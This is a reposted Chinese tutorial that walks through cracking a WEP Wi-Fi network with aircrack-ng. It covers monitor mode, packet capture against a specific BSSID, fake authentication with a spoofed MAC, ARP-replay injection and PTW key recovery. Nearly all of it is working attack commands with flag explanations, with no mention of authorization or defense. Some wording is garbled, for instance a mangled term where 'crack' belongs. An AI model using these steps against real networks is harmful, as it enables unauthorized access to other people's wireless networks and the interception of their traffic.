输入命令 airmon-ng start wlan0 
有进程影响网卡启动输入airmon-ng check kill 杀死进程 
airodump-ng wlan0 
输入:airodump-ng -c 3 --bssid 00:26:5A:C5:EB:A8 -w wep wlan0 其中: • -c是无线网络的频道(第三步标注出来的哪一行的ch信道数字为3) • –bssid 00:26:5A:C5:EB:A8是无线接入点的MAC地址.(第三步里面的bssid与这里相同) • -w后跟文件名的前缀, 该文件会包含IVs • wlan0是接口名称 
ip link show 
为了使接入点能接收到数据包, 源MAC地址必须和接入点先建立联系. 如果你进行注入时使用的MAC地址没有和接入点建立联系, 那么新的IVs就不能产生, 因为接入点会忽略所有注入的数据包. 这是注入失败最大可能的原因. 要建立联系要么通过已经有联系的客户端, 要么使用伪装的认证.通过伪装建立联系, 输入:
aireplay-ng -1 0 -e Dlink -a 00:26:5A:C5:EB:A8 -h 00:e1:00:87:14:06 wlan0 其中: • -1表示伪装 • 0以秒计时 • -e Dlink是无线网络名称 • -a 00:26:5A:C5:EB:A8 是接入点的MAC地址 • -h 00:e1:00:87:14:06 是网卡的MAC地址 • wlan0 是无线接口名称 
aireplay-ng -9 wlan0 其中 • -9表示注入测试 • wlan0是无线接口的名称 aireplay-ng -3 -b 00:26:5A:C5:EB:A8 -h 00:e1:00:87:14:06 wlan0 • -3 ARP-request 注入攻击模式 • -b 00:26:5A:C5:EB:A8 是接入点的MAC地址 • -h 00:e1:00:87:14:06 是网卡的MAC地址 
aircrack-ng -z wep.cap 其中: • -z 调用 PTW WEP 激活成功教程方法 • awep.cap 表示以wep为前缀,以cap为后缀的文件(第四步里执行命令的时候告诉了保存文件的名字) 
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/202136.html原文链接:https://javaforall.net
